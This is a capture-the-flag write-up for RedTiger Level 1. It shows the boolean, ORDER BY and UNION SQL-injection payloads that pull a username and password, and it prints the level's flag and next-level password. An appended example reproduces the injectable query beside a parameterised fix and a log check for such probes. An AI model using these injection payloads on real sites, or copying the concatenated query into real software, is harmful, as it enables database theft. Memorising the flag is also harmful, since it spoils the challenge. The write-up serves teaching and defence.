Level 1

Writeup

  • https://redtiger.labs.overthewire.org/level1.php?cat=1

Detect

  • Append and 1=1, then and 1=2, to the URL to check whether the parameter is injectable
  • Result with and 1=1
    This hackit is cool :)
    My cats are sweet.
    Miau
    
  • Result with and 1=2
    This category does not exist!
    
  • This confirms that the cat parameter is vulnerable to SQL injection

Exploit

  • Append ORDER by 1 to the URL and count upward to find the number of columns; when ORDER by 5 is reached the error message disappears, so there are 4 columns
  • With 4 columns confirmed, inject union select 1,2,3,4; columns 3 and 4 are displayed on the page

    This hackit is cool :)
    My cats are sweet.
    Miau
    
    3
    4
    
  • Query username and password from the level1_users table mentioned in the challenge hint
    • union select 1,2,username,password from level1_users
      Hornoxe
      thatwaseasy
      
  • After logging in we get

    You can raise your wechall.net score with this flag: 27cbddc803ecde822d87a7e8639f9315
    
    The password for the next level is: 4_is_not_random
    
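The following is an added example, not part of the writeup or of the RedTiger challenge code. It reproduces the defect the Detect and Exploit steps rely on (the cat parameter pasted straight into the SQL text) against an in-memory SQLite database, places the hardened form beside it, and adds a log check that flags the non-numeric cat values those probes leave behind. The table and column names are assumptions modelled on the writeup, the user row is a constructed placeholder, and the access-log lines are constructed.

```python
"""Vulnerable vs. hardened category lookup, plus a log check for the probes
used in the writeup. Schema names are assumptions, not the challenge's real
schema; the level1_users row is a constructed placeholder."""
import sqlite3
from urllib.parse import parse_qs, urlsplit

SCHEMA = """
CREATE TABLE posts (id INTEGER PRIMARY KEY, cat INTEGER, title TEXT, body TEXT);
CREATE TABLE level1_users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO posts VALUES (1, 1, 'This hackit is cool :)', 'My cats are sweet.');
INSERT INTO posts VALUES (2, 1, 'Miau', 'Miau');
INSERT INTO level1_users VALUES (1, 'demo_user', 'demo_pass');  -- constructed placeholder
"""


def make_db():
    """Build the constructed in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, cat):
    """Before: the ?cat= value is concatenated into the SQL string, so
    'and 1=2' or 'union select ...' become part of the query. This is the
    behaviour the writeup observes: a true condition keeps the rows, a false
    one empties the result, and a UNION pulls rows from another table."""
    sql = "SELECT id, cat, title, body FROM posts WHERE cat=" + cat
    return conn.execute(sql).fetchall()


def safe_lookup(conn, cat):
    """After: the value must be a plain non-negative integer and is bound as a
    query parameter, so it can never change the structure of the statement."""
    if not cat.isdigit():
        raise ValueError("cat must be a non-negative integer")
    return conn.execute(
        "SELECT id, cat, title, body FROM posts WHERE cat=?", (int(cat),)
    ).fetchall()


# Constructed access-log lines (Apache combined-log shape), not real traffic.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /level1.php?cat=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /level1.php?cat=1%20and%201=2 HTTP/1.1" 200 128',
    '10.0.0.5 - - [01/Jan/2024:12:00:02 +0000] "GET /level1.php?cat=1%20union%20select%201,2,3,4 HTTP/1.1" 200 540',
]


def flag_non_numeric(log_lines, param="cat"):
    """Return the URL-decoded values of `param` that are not plain integers.
    A numeric id parameter that arrives with spaces or keywords in it is the
    signature of the boolean and UNION probes shown in the writeup."""
    hits = []
    for line in log_lines:
        try:
            path = line.split('"')[1].split(" ")[1]  # request-line target
        except IndexError:
            continue  # malformed line, skip it
        for value in parse_qs(urlsplit(path).query).get(param, []):
            if not value.isdigit():
                hits.append(value)
    return hits


if __name__ == "__main__":
    db = make_db()
    print("and 1=1 ->", len(vulnerable_lookup(db, "1 and 1=1")), "rows")
    print("and 1=2 ->", len(vulnerable_lookup(db, "1 and 1=2")), "rows")
    print("hardened lookup ->", len(safe_lookup(db, "1")), "rows")
    print("flagged log values:", flag_non_numeric(LOG_LINES))
```

The hardened version rejects the probe before any SQL runs, which is why the true/false comparison in the Detect step stops being observable: both inputs produce the same validation error instead of two different pages.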
